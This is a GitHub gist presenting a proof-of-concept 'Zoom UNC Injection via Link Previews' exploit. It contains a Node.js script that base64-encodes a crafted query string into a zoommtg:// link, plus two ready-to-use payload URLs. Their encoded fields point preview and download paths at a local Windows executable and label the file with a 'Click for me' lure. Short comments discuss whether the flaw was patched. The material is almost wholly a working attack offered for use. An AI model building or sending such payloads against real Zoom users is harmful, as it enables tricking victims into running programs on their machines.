Skip to content

Instantly share code, notes, and snippets.

@pwnsdx

pwnsdx/converter.js

Last active Oct 18, 2020
Star
Embed
What would you like to do?
Learn more about clone URLs
Download ZIP
Zoom UNC Injection via Link Previews
Raw
converter.js
// Usage to build a custom url
// sabri@localhost Desktop % node converter.js "cmd=sic&type=none&uss=355fed60.8b5mS4m5-EvxX4mpOGePJnqP7eHtppIFCmhYCQWWa8Da49yd91RbLyWP6RwF31vD&cnonce=3YHffyG67M1KfWNLg-JiWofUJJRpcAmCck9W3n0-MKA-&app=chrome&from=meeting&previewUrl=%5C%5C%3F%5CC%3A%5CWindows%5Cexplorer.exe&downloadUrl=%5C%5C%3F%5CC%3A%5CWindows%5Cexplorer.exe&fileName=Click%20for%20me%20%40pwnsdx&fileSize=240&fileId=&thumbnailUrl=https%3A%2F%2Fwww.getdigital.eu%2Fweb%2Fgetdigital%2Fgfx%2Fproducts%2F__generated__resized%2F380x380%2FAufkleber_Trollface.jpg"
// Your URL is zoommtg://zoom.us/zoom?mcf=0&browser=chrome&confid=Y21kPXNpYyZ0eXBlPW5vbmUmdXNzPTM1NWZlZDYwLjhiNW1TNG01LUV2eFg0bXBPR2VQSm5xUDdlSHRwcElGQ21oWUNRV1dhOERhNDl5ZDkxUmJMeVdQNlJ3RjMxdkQmY25vbmNlPTNZSGZmeUc2N00xS2ZXTkxnLUppV29mVUpKUnBjQW1DY2s5VzNuMC1NS0EtJmFwcD1jaHJvbWUmZnJvbT1tZWV0aW5nJnByZXZpZXdVcmw9JTVDJTVDJTNGJTVDQyUzQSU1Q1dpbmRvd3MlNUNleHBsb3Jlci5leGUmZG93bmxvYWRVcmw9JTVDJTVDJTNGJTVDQyUzQSU1Q1dpbmRvd3MlNUNleHBsb3Jlci5leGUmZmlsZU5hbWU9Q2xpY2slMjBmb3IlMjBtZSUyMCU0MHB3bnNkeCZmaWxlU2l6ZT0yNDAmZmlsZUlkPSZ0aHVtYm5haWxVcmw9aHR0cHMlM0ElMkYlMkZ3d3cuZ2V0ZGlnaXRhbC5ldSUyRndlYiUyRmdldGRpZ2l0YWwlMkZnZnglMkZwcm9kdWN0cyUyRl9fZ2VuZXJhdGVkX19yZXNpemVkJTJGMzgweDM4MCUyRkF1ZmtsZWJlcl9Ucm9sbGZhY2UuanBn&t=1585795509792
const url = require('url');
const confid = process.argv[2];
const zoomUrl = `zoommtg://zoom.us/zoom?mcf=0&browser=chrome&confid=${Buffer.from(confid).toString('base64')}&t=1585795509792`;
console.log(`Your URL is ${zoomUrl}`);
Raw
payload-dropbox.url
zoommtg://zoom.us/zoom?mcf=0&browser=chrome&confid=Y21kPXNpYyZ0eXBlPWRyb3Bib3gmdXNzPTM1NWZlZDYwLjhiNW1TNG01LUV2eFg0bXBPR2VQSm5xUDdlSHRwcElGQ21oWUNRV1dhOERhNDl5ZDkxUmJMeVdQNlJ3RjMxdkQmY25vbmNlPTNZSGZmeUc2N00xS2ZXTkxnLUppV29mVUpKUnBjQW1DY2s5VzNuMC1NS0EtJmFwcD1jaHJvbWUmZnJvbT1tZWV0aW5nJnByZXZpZXdVcmw9JTVDJTVDJTNGJTVDQyUzQSU1Q1dpbmRvd3MlNUNleHBsb3Jlci5leGUmZG93bmxvYWRVcmw9JTVDJTVDJTNGJTVDQyUzQSU1Q1dpbmRvd3MlNUNleHBsb3Jlci5leGUmZmlsZU5hbWU9Q2xpY2slMjBmb3IlMjBtZSUyMCU0MHB3bnNkeCZmaWxlU2l6ZT0yNDAmZmlsZUlkPSZ0aHVtYm5haWxVcmw9&t=1585795509792
Raw
payload.url
zoommtg://zoom.us/zoom?mcf=0&browser=chrome&confid=Y21kPXNpYyZ0eXBlPW5vbmUmdXNzPTM1NWZlZDYwLjhiNW1TNG01LUV2eFg0bXBPR2VQSm5xUDdlSHRwcElGQ21oWUNRV1dhOERhNDl5ZDkxUmJMeVdQNlJ3RjMxdkQmY25vbmNlPTNZSGZmeUc2N00xS2ZXTkxnLUppV29mVUpKUnBjQW1DY2s5VzNuMC1NS0EtJmFwcD1jaHJvbWUmZnJvbT1tZWV0aW5nJnByZXZpZXdVcmw9JTVDJTVDJTNGJTVDQyUzQSU1Q1dpbmRvd3MlNUNleHBsb3Jlci5leGUmZG93bmxvYWRVcmw9JTVDJTVDJTNGJTVDQyUzQSU1Q1dpbmRvd3MlNUNleHBsb3Jlci5leGUmZmlsZU5hbWU9Q2xpY2slMjBmb3IlMjBtZSUyMCU0MHB3bnNkeCZmaWxlU2l6ZT0yNDAmZmlsZUlkPSZ0aHVtYm5haWxVcmw9aHR0cHMlM0ElMkYlMkZ3d3cuZ2V0ZGlnaXRhbC5ldSUyRndlYiUyRmdldGRpZ2l0YWwlMkZnZnglMkZwcm9kdWN0cyUyRl9fZ2VuZXJhdGVkX19yZXNpemVkJTJGMzgweDM4MCUyRkF1ZmtsZWJlcl9Ucm9sbGZhY2UuanBn&t=1585795509792
@Marius-Sheppard

This comment has been minimized.

Sign in to view
Copy link

@Marius-Sheppard Marius-Sheppard commented Apr 26, 2020

Was this patched?
@pwnsdx

This comment has been minimized.

Sign in to view
Copy link
Owner Author

@pwnsdx pwnsdx commented May 10, 2020
edited

Was this patched?

It wasn't when they released the first fixes but I'd say probably. Not going to reinstall this thing to check again, even in a VM.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment